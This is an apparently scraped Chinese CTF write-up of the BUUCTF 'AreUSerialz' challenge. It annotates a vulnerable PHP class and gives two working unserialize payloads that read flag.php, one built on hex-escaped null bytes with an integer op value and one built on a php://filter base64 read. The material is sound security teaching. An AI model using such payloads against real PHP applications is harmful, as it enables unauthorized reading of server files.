Buuctf[网鼎杯 2020 青龙组]AreUSerialz

[网鼎杯 2020 青龙组]AreUSerialz
打开题目仔细阅读源码

<?php
  
include("flag.php");
highlight_file(__FILE__); //文件包含，联想到php://filter伪协议读取文件

class FileHandler {
  
    protected $op;//protected保护类，成员可以被自身以及其子类和父类访问
    protected $filename;
    protected $content;
  
    function __construct() {//构造函数
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }
  
    public function process() {
        if($this->op == "1") {
            $this->write();
        } 
        else if($this->op == "2") {
            $res = $this->read();//弱比较，如果是op=2，运行read函数，并将运行后的结果赋值res，然后将$res放到output函数中
            $this->output($res);
        }
         else {
            $this->output("Bad Hacker!");
        }
    }
  
    private function write() {//private私有类只能自身访问，无法从外部类访问
        if(isset($this->filename) && isset($this->content))//判断filname和content是否为空 {
            if(strlen((string)$this->content) > 100) {//判断content的长度是否大于100
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);//file_put_contents将一个字符串写入文件
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }
  
    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }
  
    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }
    function __destruct() {//析构函数 该函数会在类的一个对象被删除时自动调用。
        if($this->op === "2")//强比较必须相等
            $this->op = "1";//将1赋值给op
        $this->content = "";//将content至空
        $this->process();
    }
  
}
  
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))//ord返回（）内字符对应的 Unicode 数值
        //若s字符数组中有字符的编码值不在32~125则报错
            return false;
    return true;
}
  
if(isset($_GET{'str'})) {
  //传参str
    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
  
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82

思路：构造一个payload去执行read()函数，读取flag.php的内容。
函数绕过：
（1）$op,$filename,$content三个变量权限都是protected，而protected权限的变量在序列化的时会有%00*%00字符，%00字符的ASCII码为0，就无法通过上面的is_valid函数校验
　　利用大写S采用的16进制，来绕过is_valid中对空字节的检查。 //00 替换 %00 。
　（2）强比较和弱比较的利用。将op设置为int型的2，op === "2"为false，op == "2"为true,绕过析构函数中的if判断，同时又可以调用到读文件的流程
于是构造payload

payload：

O%3A11%3A%22FileHandler%22%3A3%3A%7BS%3A5%3A%22\00%2A\00op%22%3Bi%3A2%3BS%3A11%3A%22\00%2A\00filename%22%3BS%3A8%3A%22flag.php%22%3BS%3A10%3A%22\00%2A\00content%22%3BS%3A0%3A%22%22%3B%7D
1

抓包：

法二：
还有一种简单粗暴的方法
利用public绕过，用伪协议读取

   class FileHandler{
   public $op=2;
   public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
   public $content=2;
   }
   $a = new FileHandler();
   echo serialize($a);  
1
2
3
4
5
6
7

payload：

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";i:2;}
1

php7.1+的新特性，对属性类型不敏感，本地序列化的时候将protected属性改为public进行绕过。
但我不知道师傅们是怎么看出来这道题php版本是7.1+
想了解详情移步：php官网